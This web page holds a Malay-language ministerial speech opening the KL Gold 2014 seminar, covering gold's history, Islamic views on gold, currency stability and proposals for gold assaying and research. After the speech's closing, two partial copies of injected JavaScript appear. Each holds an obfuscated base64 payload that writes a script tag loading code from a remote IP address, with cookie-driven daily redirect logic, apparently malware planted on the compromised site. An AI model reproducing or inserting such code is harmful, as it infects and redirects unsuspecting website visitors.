YaPEIM » KL Gold “Gold: Sustaining Future Growth and it’s Challenges”

Terkini

KL Gold “Gold: Sustaining Future Growth and it’s Challenges”

Ucapan perasmian YB Mejar Jeneral Dato Seri Jamil Khir Bin Hj Baharom sempena KL Gold 2014 di KLCC.

1. Dato’ Hj Abd Malek Awang Kechil (Presiden & Pengerusi Lembaga Pemegang Amanah YaPEIM);

2. Dato’ Hjh Zaleha Hussein (Timbalan Presiden & Timbalan Pengerusi Lembaga Pemegang Amanah YaPEIM);

3. Dato’ Abibullah Samsuddin (Ketua Pengarah YaPEIM);

4. Ahli-ahli Lembaga Pemegang Amanah YaPEIM;

5. Pengerusi & Ahli-ahli Seketariat Serantau Ar Rahnu

6. Wakil-wakil daripada Penganjur Dalam & Luar Negara

7. Pembentang Kertas Kerja

8. Peserta-peserta pameran KL Gold 2014

9. Tuan-tuan & puan-puan yang dihormati sekalian.

Assalamu’alaikum Wr Wbth and  Salam 1 Malaysia.

1. Saya ingin mengambil peluang ini untuk mengucapkan terima kasih khusus kepada  Presiden dan Pengurusan YaPEIM, kerana menjemput saya untuk bersama dan menyampaikan Ucap Utama sempena perasmian rasmi KL Gold 2014 ini. Saya menganggap peluang ini sebagai suatu penghormatan kerana ia merupakan ruang untuk kita berkongsi idea dan pemikiran terhadap tajuk “Gold: Sustaining Future Growth and it’s Challenges”.

2. Saya juga ingin merakamkan setinggi tahniah kepada kepimpinan dan Pengurusan YaPEIM di atas  inisiatif penganjuran KL Gold 2014 ini, kerana program seperti ini merupakan langkah kehadapan dalam menghidupkan wacana intelektual berhubung dengan subjek yang memerlukan tahap penguasaan dan profesionalisme yang tinggi.

3. Saya menganggap pemilihan tema KL Gold “Gold: Sustaining Future Growth and it’s Challenges” (Emas: Kelestarian Pertumbuhan Masa Depan dan Cabarannya), sebagai sangat tepat. Dimana perbincangannya bukan sahaja memfokuskan terhadap penerokaan idea dan formula untuk memastikan kelestarian pertumbuhan pada masa depan (Sustaining Future Growth), tetapi pada masa yang sama wacana ini juga saya jangkakan akan menjurus kepada langkah mengoptimumkan peranan yang dimainkan oleh galian bernilai khususnya emas dalam menentukan kelestarian pertumbuhan, termasuk usaha memperkukuhkan pengurusan  sistem ekonomi dan kewangan di dunia amnya.

4. Dalam membahaskan tema KL Gold 2014 ini “Gold: Sustaining Future Growth and It’s Challenges” ini, saya berpendapat bahawa  terdapat tiga aspek utama berikut yang  perlu dibahaskan:

Pertama : Tinjauan terhadap Emas sebagai Galian Bernilai yang mempunyai ciri-ciri tertentu dan perkembangan serta peranannya dalam sejarah manusia;

Kedua : Keperluan terhadap pertumbuhan ekonomi dan kepentingan untuk melestarikan pertumbuhan serta kaitannya terhadap kesejahteraan manusia; dan

Ketiga : Mengenalpasti cabaran-cabaran yang akan dihadapi dalam merealisasikan peranan emas dalam menentukan kelestarian pertumbuhan pada masa depan. 

TINJAUAN TERHADAP EMAS DAN  PERANANNYA

5. Sebagai memulakan perbincangan Emas dan peranannya dalam menentukan kelestarian pertumbuhan masa depan dan cabarannya, suka saya mengajak anda sekalian untuk melihat kembali kepada maksud dan definasi emas yang pernah dibuat  oleh Ibn Khaldun seorang tokoh pemikir, pentadbir dan Ilmuan terkemuka Islam pada Abad ke 14; dan juga  definasi yang diberikan dalam Oxford Dictionary.

6. Ibn Khaldun  (1322M hingga 1406M), sewaktu beliau membincangkan hubungan wang dengan kemajuan Negara, beliau menyatakan:

“suatu yang harus diketahui ialah kekayaan seperti emas, perak, batu permata, dan barang-barang lain yang boleh dibuat peralatan adalah tidak banyak berbeza dengan galian-galian lain dan modal yang diperolehi daripada tembaga, timah hitam serta logam lainnya. Maka peradabanlah yang menyebabkan semuanya itu ada, melalui usaha manusia, yang menjadikannya bertambah atau berkurang. Kesemua barang-barang itu yang ada di dalam simpanan manusia itu boleh dipindahkan dari satu keturunan kepada keturunan berikutnya. Dan mungkin juga dipindahkan daripada suatu daerah ke daerah yang lain, dan dari satu dinasti ke dinasti yang lain, sesuai dengan tujuan diadakan dan peradaban khusus yang memerlukannya”.

7. Oxford Dictionary pula memberi definasi emas seperti berikut:

“Gold is a yellow precious metal, the chemical element of atomic number 79, used in jewellery and decoration and to guarantee the value of currencies: (Symbol: Au) ”.

Daripada definasi ini, dapat kita senaraikan antara aspek penting yang boleh kita kongsikan bersama seperti berikut:

Pertama : Suatu galian bernilai;

Kedua : Mempunyai elemen kimia dengan symbol Au;

Ketiga : Mempunyai nombor atom 79;

Keempat : Digunakan dalam barang kemas dan perhiasan; dan

Kelima : Menjamin nilai matawang.

8. Kenyataan Ibn Khaldun dan definasi Oxford Dictionary ini menarik perhatian saya dalam membincangkan tema KL Gold 2014 ini, dimana daripada maksud dan definasi yang dikemukakan tersebut, terdapat  dua dimensi yang besar dan utama seperti berikut:

Pertama : Emas secara fizikalnya mempunyai nilai, ciri dan kualiti yang mempunyai manfaatnya yang tersendiri; dan

Kedua : Emas juga memberi suatu dimensi yang lebih luas daripada sekadar kedudukannya secara fizikal; dimana  Ibn Khaldun mengaitkan peranan emas terhadap nilai dan peradaban manusia.

SEJARAH PENEMUAN DAN PERLOMBONGAN EMAS

9. Mengikut para pengkaji sejarah, ahli geologi dan  pengkaji galian bernilai (khususnya emas), direkodkan bahawa  emas adalah suatu galian yang mempunyai nilai dan kepentingannya dalam sejarah kehidupan manusia. Sehubungan dengan itu emas sering menjadi perhatian penting dan utama;  dan ianya di cari oleh manusia mengikut tujuan dan keperluan masing-masing.

10. Maka sebab itulah  sejak zaman berzaman proses mencari (melombong samada secara tradisi mahupun menggunakan teknologi tertentu) terus berlaku dan mereka menggunakan emas ini mengikut minat dan keperluan masing-masing.

11. Terdapat catatan sejarah bahawa penemuan emas terawal di dunia dijumpai di Mesir, dalam bentuk ‘nugget kuning’ kira-kira  4,000 tahun sebelum masehi lagi. Sejak itulah emas mula dilombong dan dikeluarkan dari perut bumi.

12. Di Malaysia umpamanya, perlombongan emas telah bermula pada tahun 2,000 sebelum masehi lagi; dan mengikut Alexandrian Geographer (Ptolemy), pada abad kedua masehi Semenanjung Tanah Melayu pernah termasuk dalam jolokan nama ‘Golden Peninsula’ (Traditional Malaysian Jewellery, Muzium Negara, 2007), walaupun tidak dapat disahkan jolokan nama tersebut samada ianya mempunyai kaitan langsung dengan kewujudan galian dan aktiviti perlombongan seperti yang dinyatakan.

IMPAK EMAS TERHADAP BUDAYA DAN EKONOMI SETEMPAT

13. Sebagai perkongsian dengan anda semua, saya suka menyatakan bahawa, istimewanya dalam konteks Malaysia, sesungguhnya galian bernilai (emas) mempunyai tempat yang tersendiri dan memberi kesan yang sangat mendalam terhadap bahasa dan budaya masyarakat di Negara ini sejak dari dahulu hingga ke saat ini, disamping emas juga pernah  mendapat tempat yang sangat penting dari perspektif  ekonomi dan kewangan Negara pada suatu ketika dahulu; dengan meletakkan emas sebagai sesuatu yang bernilai dan sangat berharga.

14. Diantara yang dapat saya kongsikan disini, kedudukan emas dari segi bahasa dan budaya umpamanya, terdapat  istilah Jambatan Emas, Anak Emas, Warga Emas dan Sangkar Emas; begitu juga terdapat  peribahasa seperti “Cincin Emas tak kan tanpan bermata kaca”, “Hujan Emas di negeri orang, hujan batu di negeri sendiri” dan “Masa itu Emas” dan sebagainya.

15. Sementara dari segi ekonomi dan kewangan pula, pada zaman kerajaan Melayu Melaka, Mata Wang Melayu pernah digunakan di Semenanjung Tanah Melayu dan gugusan Kepulauan Melayu pada abad ke-15. Mata Wang ini mula diperkenalkan semenjak pemerintahan Kesultanan Melayu Melaka.

16. Antara bentuk mata wang yang digunakan pada masa itu termasuklah debu emas, batang perak, bongkah timah & kulit siput gerus. Pada pedagang asing juga memperkenalkan mata wang seperti tembaga China, duit Pasai, emas dinar, duit timah & duit tempatan. Walaubagaimanapun, mata wang Pasai menjadi asas  pembentukan mata wang di Melaka dan terus digunakan hingga tahun 1514 (Portal rasmi DBP, 2014).

HUBUNGAN EMAS DAN KEPERLUAN MANUSIA

17. Dalam konteks dunia secara amnya, sejarah telah membuktikan bahawa emas mempunyai peranan yang tersendiri dalam pelbagai aspek keperluan manusia; dan saya rumuskan seperti berikut, iaitu:

Pertama : Emas sebagai barang perhiasan

Dalam konteks ini,  saya suka memetik apa yang dinyatakan oleh World Gold Council:

“Gold has been treasured for its natural beauty and radiance. Gold’s unique physical properties, its radiance and malleability, its purity and untarnishable nature, have proved an irresistible combination for jewellery designers all over the world. Over the centuries, goldsmiths and highly skilled artisans have infused gold with their own unique talents, creativity and passion. The result has been the extraordinary variety of gold jewellery that exists today.”

Mengikut perangkaan World Gold Council (2014), permintaan bagi tujuan jewellery terus meningkat sejak tahun 2009 dimana pada tahun 2009 (1,760 ton) kepada 1013 (2,360 ton).

Kedua : Emas sebagai penilai sumbangan dan penghormatan

Emas sangat terkenal digunakan sebagai penilai tertinggi kepada sumbangan yang diberikan oleh indvidu dan mereka yang berjasa. Sebab itu emas dijadikan bentuk apresiasi yang sangat tinggi termasuk melalui Pengurniaan Darjah Kebesaran dan Bintang-bintang oleh pemimpin tertinggi sesebuah Negara, yang menggunakan emas sebagai pengukuh nilai kepada bintang-bintang tersebut.

Ketiga : Emas menjadi subjek terkait dengan Agama

Emas juga menjadi subjek yang sangat terkait dengan Agama samada dalam menunaikan tanggungjawab di dunia, mahupun sebagai satu bentuk balasan di alam Akhirat nanti. Dari perspektif Islam, emas dan perak mendapat perhatian yang sangat istimewa, termasuk kepentingannya dalam sektor ekonomi  dan  aspek kesejahteraan umat; mahupun kaitannya dengan alam Akhirat nanti.

Allah SWT menjelaskan kedudukan emas seperti yang terkandung dalam Ayat 23 Surah Al Hajj (bermaksud):

Sesungguhnya Allah akan memasukkan orang-orang yang beriman dan beramal soleh ke dalam Syurga yang mengalir padanya beberapa sungai; mereka dihiaskan di situ dengan gelang-gelang emas dan mutiara, dan pakaian mereka di situ dari sutera”.

Dalam konteks yang lain, Allah SWT menegaskan kaitan emas dengan tanggungjawab, seperti terkandung di dalam Al Quran, Surah At Taubah Ayat 34 (bermaksud):

 “Dan (ingatlah) orang-orang yang menyimpan emas dan perak serta tidak membelanjakannya pada jalan Allah, maka khabarkanlah kepada mereka dengan (balasan) azab seksa yang tidak terperi sakitnya…”

Keempat : Emas sebagai pengukur nilai dan matawang

Emas pernah diterima secara meluas sebagai medium pengukur nilai sesuatu barangan dan dijadikan medium bagi penyelesaian urusniaga. Sebab itulah emas pernah diterima sebagai matawang dan digunakan juga sebagai asas jaminan nilai matawang.

Dalam catatan sejarah bahawa penggunaan emas sebagai matawang termasuk sejarah penggunaan dinar (matawang berasaskan emas) digunakan secara meluas  pada zaman Bezantyne dan matawang dinar tersebut diteruskan pada era perkembangan Islam setelah kedatangan Rasulullah SAW dan diteruskan sehingga pemerintahan kerajaan Uthmaniyyah terakhir pada tahun 1920.

Perjanjian  Brettonwood 1944 yang meletakkan peranan secara jelas dan konkrit terhadap kedudukan dan peranan emas sebagai penilai dan jaminan kepada pengwujudan matawang (Malaysia juga memberi perhatian yang sangat tinggi kepada kesepakatan yang dicapai ini  dimana sejak tahun 1957 lagi, kita telah mewujudkan Akta Brettonwood 1957 (pindaan 2008).

Apabila Perjanjian Brettonwood di perkenalkan, emas diberi peranan dalam sistem kewangan; kedudukan ekonomi dan matawang dunia berada dalam keadaan yang lebih stabil. Bagaimanapun apabila USD melepaskan ikatannya dengan peranan emas (Presiden Nixon), dengan kelahiran fiat money (legal tender) sepenuhnya tanpa dikaitkan dengan emas sebagai sandaran, maka kestabilan matawang didunia menghadapi masalah dan memberi kesan yang sangat ketara terhadap kestabilan real value of money (Ahamad Kameel Meera, Real Money, 2009).

Kelima : Emas sebagai medium simpanan dan pelaburan

Emas sangat popular diterima sebagai medium menyimpan, malah juga sebagai medium pelaburan. Medium seperti ini didapati lebih stabil dan mudah cair berbanding dengan penyimpanan dan pelaburan dalam bentuk bentuk yang lain. Negara-negara utama didunia pun menerima emas sebagai satu daripada pilihan penting dalam bentuk simpanan mahupun pelaburan.

Diantara negara utama dunia yang memiliki emas dalam bentuk simpanan dan pelaburan adalah seperti Amerika Syarikat (8,133.5 ton) diikuti oleh Germany (3,401 ton), Italy (2,451.8 ton), France (2,435.4 ton), China (1,054.1 ton), Switzerland 1040.1 ton), Russia (775.2 ton), Japan (765 ton) dan Netherlands (612 ton). Sumber: World Gold Council (2010),

Keenam : Emas mula digunakan di bidang industri

Emas sudah mula digunakan di dalam industri terutama dalam teknologi elektronik dan teknologi maklumat. Malah kini emas juga digunakan di bidang perubatan termasuk pergigian & pembedahan. Mengikut perangkaan yang dikeluarkan oleh World Gold Council, penggunaannya di bidang ini secara relatifnya adalah substantif dan kini (2013) sejumlah 409.1 ton, dalam bidang elektronik, pergigian (dentistry) dan lain-lain .

MENGOPTIMUMKAN PERANAN EMAS

18. Berdasarkan kepada penerimaan yang sangat tinggi manusia terhadap galian bernilai (emas) ini, selain daripada aspek pengeluaran emas dunia, pasang surut permintaan terhadap komoditi yang mempunyai pengaruh langsung terhadap harga galian ini, keadaan ekonomi dan suasana politik serta keselamatan dunia pada satu satu masa; peranan seperti yang disenaraikan tadi pastilah ianya juga mempunyai kesan langsung terhadap harga dan peranannya terhadap pertumbuhan pada masa depan;  Maka atas dasar itu saya berpendapat adalah wajar suatu tinjauan dan kajian yang lebih serius dilakukan bagi mengoptimumkan kedudukan emas sebagai suatu galian bernilai yang mempunyai ciri-ciri dan keunikan yang dimilikinya dengan mengintergrasikan nya di dalam sistem masa kini, disamping  mengambil Hikmah disebalik kewujudan Galian Bernilai ini terhadap kehidupan manusia.

KEPENTINGAN PERTUMBUHAN EKONOMI DAN KAITANNYA 

DENGAN KESEJAHTERAAN UMMAH

19. Kepentingan untuk menggerakkan pertumbuhan ekonomi pada setiap masa dan memastikan kelestariannya  tidak lagi dinafikan. Dalam konteks ini,  mengingatkan kita kepada apa  yang pernah di rumuskan oleh Ibn Khaldun (Abad ke 14), dimana beliau menyatakan bahawa kekuatan dan kemajuan pembangunan ekonomi sesebuah negara biasanya tidak diukur dan dinilai dari sudut jumlah banyaknya emas dan perak yang dimiliki oleh negara berkenaan. Namun ia bergantung kepada kemampuan negara tersebut mengeluarkan bahan-bahan yang dapat menghasilkan seberapa banyak emas dan perak.

20. Dalam konteks ini beliau menyatakan bahawa:

“Kemajuan sesebuah negara amat bergantung kepada sebanyak mana harta yang dapat diperolehi dan jumlah wang yang dapat dikumpul oleh sesebuah negara. Sekiranya banyak wang yang dapat dikumpul oleh sesebuah negara, ia akan menyebabkan kerajaan tersebut menjadi kuat dan bandarnya menjadi luas dan jumlah penduduknya semakin bertambah serta pusat-pusat perniagaannya menjadi maju dan taraf hidup penduduknya semakin meningkat. Oleh itu, pembangunan serta kemakmuran sesebuah negara sangat erat hubungannya dengan wang”.

21. World Business Council pula memberi definasi terhadap istilah sustaining atau  sustainability yang bermaksud “Continuing commitment of business to behave in an ethical way and contribute toward economic development while improving the quality of life of the workforce, their families, and the local and global community, as well as future generations

22. Istilah sustaining (World Business Council) dan kemajuan (Ibn Khaldun), intinya ialah keupayaan memenuhi keperluan semasa  dan juga keperluan masa depan. Bagi memenuhi keperluan ini ianya memerlukan suatu kualiti yang mengupaya sesuatu keperluan itu dipenuhi.

23. Dalam konteks Islam, keperluan yang dimaksudkan ini sangat terkait dengan maksud yang lebih besar iaitu kesejahteraan dan Rahmat, selaras dengan misi  besar pengutusan Rasulullah SAW dan menjadi tanggungjawab Generasi kini  untuk meneruskannya, seperti yang ditegaskan  oleh Allah SWT dalam Al Quran Surah Al Anbiya’ Ayat 107 (bermaksud):

 “Dan tiadalah Kami mengutuskan engkau (wahai Muhammad), melainkan untuk menjadi Rahmat bagi sekalian alam”.

24. Bagi merealisasikan misi kesejahteraan ummah ini, adalah sangat penting untuk kita  membina kekuatan, dan yang pastinya kualiti sangat diperlukan dalam membina kekuatan yang diperlukan. Tuntutan untuk memiliki kualiti ini dilihat sangat mendasar dan mengingatkan kita kepada Firman Allah SWT  Al Quran Surah Al Ra’d Ayat 17 (bermaksud) :

 “…adapun buih itu maka akan hilang lenyaplah ia hanyut terbuang, manakala benda-benda yang berfaedah kepada manusia maka ia tetap tinggal di bumi. Demikianlah Allah menerangkan misal-misal perbandingan.”

Ayat ini mengisyaratkan makna sebenar kualiti yang berpaksikan manfaat serta betapa besarnya kuasa kualiti (the power of quality) sebagai penentu survival  dalam meningkatkan kesejahteraan ummah (Mengikut Buku Pengurusan Islami : Menghayati Prinsip dan Nilai Qurani, YaPEIM, 2010))

25. Dalam konteks ekonomi moden, bahawa kemampuan yang di sebut oleh Ibn Khaldun, ianya juga boleh dirujuk kepada maksud pertumbuhan. Dan istilah kualiti ini juga boleh membawa maksud  keupayaan untuk memastikan kelestarian pertumbuhan pada masa depan (sustain).

CABARAN MENCAPAI KELESTARIAN  PERTUMBUHAN

Pencapaian (pertumbuhan) yang memberangsang

26. Keperluan membina kekuatan dengan melestarikan pertumbuhan seperti yang dibincangkan tidak lagi dipertikaikan. Semua Negara di dunia berusaha keras untuk mencapai pertumbuhan yang diperlukan. Dalam konteks Malaysia, walaupun dalam suasana ekonomi dunia yang tidak menentu, Alhamdulillah pertumbuhan ekonomi Negara terus mencatat peratusan yang sangat memberangsangkan. Pertumbuhan ekonomi Negara seperti digambarkan daripada pertumbuhan KDNK Negara terkini yang mencatatkan rekod sekitar 6 peratus setahun, meletakkan Negara Malaysia berada dalam alandasan yang betul bagi mencapai wawasan Negara pada tahun 2020 (terkini KDNK Negara mencapai lebih daripada 6%).

Cabaran dalam mengekalkan nilai sebenar pertumbuhan

27. Sebagai langkah memberi nilai sebenar kepada  pertumbuhan yang dicapai, faktor  kestabilan nilai sebenar wang (stability in the real value of money), wajar mendapat perhatian yang  utama. Malah faktor ini boleh disifatkan sebagai ‘counter productive’ terhadap pertumbuhan yang dicapai. Lebih-lebih lagi ianya pastilah menjadi cabaran yang utama kepada untuk memastikan kelestarian pertumbuhan berkenaan.

28. Keprihatinan terhadap  keperluan memastikan kesetabilan Nilai Sebenar Wang ini, pernah juga dibicarakan seorang tokoh kewangan Islam semasa iaitu M.Umar Chapra (Islamic Perspectives, The Islamic Faoundation, 1979), yang pernah menyatakan:

One of the most serious problems of contemporary society is persistent inflation with accompanying decline in the real value of money and monetary asset. In fact stability in the real value of money is vitally important not only for the continued long-term growth of an economy but also for social justice and economic welfare”.

29. Alhamdulillah dalam konteks Malaysia, kerajaan sentiasa memberi perhatian terhadap kadar inflasi Negara agar ianya sentiasa dipastikan berada ditahap munasabah. keprihatinan ini juga di ungkapkan oleh  YBhg Tan Sri Dr Zeti Akhtar Aziz, Gubenur Bank Negara Malaysia (Kuala Lumpur, Mac 2014), beliau menyatakan:

“ Malaysian monetary policy this year will seek to promote sustainability economic growth while also striving to prevent cost-push inflation aand keeping an eye on imbalances associated with the current environment”

30. Dalam konteks untuk mengukuhkan kestabilan nilai sebenar wang, agar faktor ini dapat memberi nilai yang sebenar terhadap pertumbuhan yang dikecapi, maka  saya juga berpendapat perbincangan pakar yang diikuti dengan kajian yang mendalam dan realistik wajar kita terus lakukan.

RUMUSAN DAN CADANGAN

31. Sebagai rumusan kepada perbincangan berkaitan dengan tema –“Gold: Sustaining future growth and it’s chalanges”, saya suka memberi satu perspektif berkaitan dengan peranan emas sebagai suatu galian bernilai, seperti berikut:

Pertama : Galian yang mempunyai nilai;

Kedua : Galian yang boleh menjadi pengukur nilai ; dan

Ketiga : Galian yang berupaya  memberi nilai;

32. Atas premis bahawa emas adalah suatu galian yang bernilai; yang mempunyai nilai, boleh menjadi pengukur nilai dan berupaya memberi nilai seperti yang saya nyatakan ini; maka saya ingin mencadangkan beberapa langkah yang wajar dilaksanakan sebagai usaha untuk melihat peranan yang optimum boleh dimainkan oleh emas dalam konteks untuk memastikan kelestarian pertumbuhan pada masa depan.

33. Diantara langkah-langkah tersebut adalah seperti berikut:

Pertama : Memastikan kesetabilan nilai sebenar wang

Bagi memastikan kesetabilan dalam Nilai Sebenar Wang dapat dipertahankan dengan  mengambil langkah mengekang faktor penyebab inflasi terus dilaksanakan;  strategi  mempertahankan kekuatan ekonomi yang miliki termasuk memastikan nilai simpanan dan pelaburan (termasuk rezab) perlu diperkukuhkan dengan menjadikan emas sebagai satu daripada pilihan yang penting bagi tujuan tersebut. Strategi ini juga wajar digalakkan untuk dilaksanakan oleh invididu dan kumpulan dalam masyarakat;

Kedua : Memperkasa peranan emas sebagai pengukur nilai

Mengkaji kemungkinan memperkasa peranan  emas sebagai alat pengukur nilai, matawang dan jaminan terhadap matawang;  dengan memberi perhatian terhadap kajian yang praktikal dan realistik, bagaimana  penyesuaian dan imbangan kedudukan nilai emas yang masih bersandarkan matawang  kepada emas menjadi penilai kepada yang lain, dapat dilaksanakan;

Ketiga : Meneroka teknologi terkini penerokaan emas

Bagi mengimbangi pengeluaran dengan permintaan emas dunia, agar peranan galian bernilai ini tidak terganggu dan benar-benar berkesan; atas dasar itu saya berpendapat adalah wajar kaedah dan teknologi yang benar-benar berkesan dengan kos yang minimum bagi  pengeluaran emas dan teknologi guna semula emas khususnya daripada penggunaan dalam industri dapat dioptimumkan;

Keempat : Menggalak penerokaan teknologi memasti ketulenan emas

Bagi memastikan strategi memanfaatkan emas sebagai kaedah simpanan, pelaburan, dan sebagai alat pengukur nilai, matawang atau jaminan terhadap matawang; dapat terlaksana tanpa terdedah kepada sebarang elemen penipuan terhadap ketulenan emas berkaitan, maka langkah meneroka dan menggunakan peralatan menggunakan teknologi terkini wajar dilakukan.

Atas dasar itulah saya menyokong penuh langkah YaPEIM mewujudkan Pusat Pencerakinan Emas yang Tak Memusnah yang pertama seumpamanya di Negara ini; yang bakal menjadi pusat rujukan kepada aktiviti untuk memastikan ketulenan emas yang reliable dan diyakini, dan pusat ini dilaksanakan berasaskan sokongan pasaran di Negara ini.

Dan saya difahamkan melalui platform KLGold 2014 kali ini juga turut membincangkan isu ini dan meneroka pendekatan serta kaedah yang boleh membantu pemain dalam industri dapat mengelak daripada terjebak dalam elemen yang negatif  ini;

Kelima : Mengoptimum manfaat emas melalui kajian dan teknologi terkini

Langkah yang lebih kehadapan wajar dilakukan untuk mmemanfaatkan kelebihan emas yang boleh dimanfaatkan dalam kehidupan manusia, dengan memberi perhatian yang lebih utama terhadap kajian bagi penggunaan di bidang seperti perubatan dan pendidikan.

Sehubungan dengan itu langkah galakan yang disediakan oleh  World Gold Council yang menyediakan galakkan  dengan menyediakan  peruntukan untuk prostate cancer research melalui kaedah nonaparticles, seharusnya dipuji dan wajar diperluaskan;

Kenam : Meneroka Hikmah di sebalik kewujudan emas  

Ciri, nilai dan kualiti  emas boleh dijadikan rujukan dalam kehidupan manusia termasuk ekonomi dan proses membangun manusiawi. Dalam konteks ini mungkin sesuai jika saya mencadangkan satu pepatah berikut iaitu “Ikutlah resmi emas; walau dimana ia berada, jati diri tetap tegap, sinar manfaat terus bergemerlapan”.

34. Adalah diharapkan apa yang saya sampaikan ini, boleh menjadi sebahagian daripada input yang penting dalam membahaskan tema : ‘Gold: Sustaining Future Growth and It’s Chalanges’ .

TAHNIAH INISIATIF MEMANTAPKAN INDUSTRI EMAS

35. Tahniah diatas inisitif dan inovasi yang diambil oleh YaPEIM dalam memantapkan industri emas dengan memberi tumpuan terhadap penyelidikan yang berterusan bagi memajukan kaedah dan teknologi baru yang bersesuaian berkaitan dengan Emas dan Galian Bernilai; Mewujudkan Makmal Penyelidikan Emas; Mewujudkan Pusat Pencerakinan Tidak memusnah (Non Destructive Assaying Centre);   Mewujudkan YaPEIM’s KL GOLD CENTRE (Pusat Emas Antarabangsa YaPEIM), dan berusaha Mewujudkan Komuniti berasaskan E-Gold (E-Gold Community).

TAHNIAH DI ATAS KEJAYAAN MENGANJURKAN KL GOLD

36. Tahniah di atas kejayaan menganjurkan KL Gold 2014 – diharapkan KL Gold akan menjadi landmark baru untuk Malaysia dalam memantapkan peranan Gold.

Didoa dan diharapkan KLGOLD 2014 akan memberi impak tersendiri dalam perjalanan kita meletakkan peranan Emas dan Galian Bernilai dalam menentukan kelangsungan dan pertumbuhan masa depan ekonomi dan kelangsungan sistem ekonomi yang lebih stabil dan kesejahteraan manusia yang lebih utuh.

Dengan kata-kata itu, dengan Lafaz Bismillahirrahmanirram dengan ini saya merasmikan KL GOLD 2014.

Selamat Berseminar,

Wabillahi Taufiq Wal Hidayah

Wassalamu’alaikum Wr Wbth

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top